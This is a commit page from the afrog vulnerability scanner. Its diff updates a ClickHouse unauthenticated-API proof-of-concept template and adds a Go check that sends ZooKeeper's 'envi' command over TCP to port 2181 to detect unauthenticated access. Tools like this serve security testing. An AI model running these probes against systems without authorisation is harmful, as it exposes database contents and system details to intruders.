crash.software
Projects
Pull Requests
Issues
Builds
afrog
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY afrog Commits 21bd6fe1
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■
    afrog-pocs/vulnerability/clickhouse-api-sql-unauth.yaml
    1 1  id: clickhouse-api-sql-unauth
    2 2   
    3 3  info:
    4  - name: ClickHouse API 数据库接口未授权访问漏洞
     4 + name: ClickHouse API 数据库接口未授权访问漏洞 8123
    5 5   author: zan8in
    6 6   severity: high
    7 7   description: |
    8 8   ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据
     9 + ClickHouse 8123端口
    9 10   "ClickHouse" && body="ok"
    10 11   reference:
    11 12   - http://wiki.peiqi.tech/wiki/serverapp/ClickHouse/ClickHouse%20API%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8E%A5%E5%8F%A3%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.html
     13 + - http://wiki.peiqi.tech/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.html
    12 14   
    13 15  rules:
    14 16   r0:
    skipped 6 lines
  • ■ ■ ■ ■ ■ ■
    pkg/gopoc/zookeeper.go
     1 +package gopoc
     2 + 
     3 +import (
     4 + "bytes"
     5 + "errors"
     6 + 
     7 + "github.com/zan8in/afrog/pkg/poc"
     8 + "github.com/zan8in/afrog/pkg/proto"
     9 + "github.com/zan8in/afrog/pkg/utils"
     10 +)
     11 + 
     12 +var (
     13 + zookeeperPort = "2181"
     14 + zookeeperUnAuthName = "zookeeper-unauth"
     15 +)
     16 + 
     17 +func zookeeperUnAuth(args *GoPocArgs) (Result, error) {
     18 + poc := poc.Poc{
     19 + Id: zookeeperUnAuthName,
     20 + Info: poc.Info{
     21 + Name: "ZooKeeper 未授权访问",
     22 + Author: "zan8in",
     23 + Severity: "high",
     24 + Description: "ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。",
     25 + Reference: []string{
     26 + "http://wiki.peiqi.tech/redteam/vulnerability/unauthorized/Zookeeper%202181%E7%AB%AF%E5%8F%A3.html",
     27 + },
     28 + },
     29 + }
     30 + args.SetPocInfo(poc)
     31 + result := Result{Gpa: args, IsVul: false}
     32 + 
     33 + if len(args.Host) == 0 {
     34 + return result, errors.New("no host")
     35 + }
     36 + 
     37 + if len(args.Port) > 0 && args.Port != "80" && args.Port != "443" {
     38 + addr := args.Host + ":" + args.Port
     39 + payload := []byte("envidddfdsfsafafaerwrwerqwe")
     40 + 
     41 + resp, err := utils.Tcp(addr, payload)
     42 + if err != nil {
     43 + return result, err
     44 + }
     45 + 
     46 + if bytes.Contains(resp, []byte("Environment")) {
     47 + result.IsVul = true
     48 + url := proto.UrlType{Host: addr, Port: args.Port}
     49 + result.SetAllPocResult(true, &url, payload, resp)
     50 + return result, nil
     51 + }
     52 + }
     53 + 
     54 + addr := args.Host + ":" + zookeeperPort
     55 + payload := []byte("envidddfdsfsafafaerwrwerqwe")
     56 + 
     57 + resp, err := utils.Tcp(addr, payload)
     58 + if err != nil {
     59 + return result, err
     60 + }
     61 + 
     62 + if bytes.Contains(resp, []byte("Environment")) {
     63 + result.IsVul = true
     64 + url := proto.UrlType{Host: addr, Port: zookeeperPort}
     65 + result.SetAllPocResult(true, &url, payload, resp)
     66 + return result, nil
     67 + }
     68 + 
     69 + return result, errors.New("check result: no vul")
     70 +}
     71 + 
     72 +func init() {
     73 + GoPocRegister(zookeeperUnAuthName, zookeeperUnAuth)
     74 +}
     75 + 
Please wait...
Page is in error, reload to recover